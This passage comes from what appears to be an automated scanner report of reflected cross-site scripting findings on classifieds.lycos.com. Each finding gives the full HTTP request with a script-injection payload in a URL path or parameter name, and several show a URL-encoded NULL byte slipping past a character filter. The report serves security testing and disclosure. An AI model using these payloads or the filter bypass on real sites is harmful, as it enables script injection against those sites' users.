<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.13. http://classifieds.lycos.com/community-rideshare/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community-rideshare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6eae"><script>alert(1)</script>49cb3ea26e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.14. http://classifieds.lycos.com/community/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f906"><script>alert(1)</script>0ecae4b5915 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community4f906"><script>alert(1)</script>0ecae4b5915/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community4f906"><script>alert(1)</script>0ecae4b5915/?mobile=1" rel="nofollow">
...[SNIP]...

1.15. http://classifieds.lycos.com/community/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9635"><script>alert(1)</script>84af8c3ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/?c9635"><script>alert(1)</script>84af8c3ea5c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community/?c9635"><script>alert(1)</script>84af8c3ea5c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.16. http://classifieds.lycos.com/housing-rent-apartment/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c87"><script>alert(1)</script>4bae919137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:30 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/?mobile=1" rel="nofollow">
...[SNIP]...

1.17. http://classifieds.lycos.com/housing-rent-apartment/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5793d"><script>alert(1)</script>d1a9830cbd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.18. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1f"><script>alert(1)</script>e88f4b85db9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356?mobile=1" rel="nofollow">
...[SNIP]...

1.19. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001a8a3"><script>alert(1)</script>cc957f8555f was submitted in the REST URL parameter 2. This input was echoed as 1a8a3"><script>alert(1)</script>cc957f8555f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f?mobile=1" rel="nofollow">
...[SNIP]...

1.20. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee82"><script>alert(1)</script>e2446b54b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1&mobile=1" rel="nofollow">
...[SNIP]...

1.21. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c683a"><script>alert(1)</script>8715acf427 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985?mobile=1" rel="nofollow">
...[SNIP]...

1.22. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0087882"><script>alert(1)</script>c0553fe1d09 was submitted in the REST URL parameter 2. This input was echoed as 87882"><script>alert(1)</script>c0553fe1d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09?mobile=1" rel="nofollow">
...[SNIP]...

1.23. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aeb3"><script>alert(1)</script>3b560751ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:11 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.24. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3123a"><script>alert(1)</script>f524eb41f7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997?mobile=1" rel="nofollow">
...[SNIP]...

1.25. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001175e"><script>alert(1)</script>a496097bfe7 was submitted in the REST URL parameter 2. This input was echoed as 1175e"><script>alert(1)</script>a496097bfe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7?mobile=1" rel="nofollow">
...[SNIP]...

1.26. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218a8"><script>alert(1)</script>ab9259f54a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
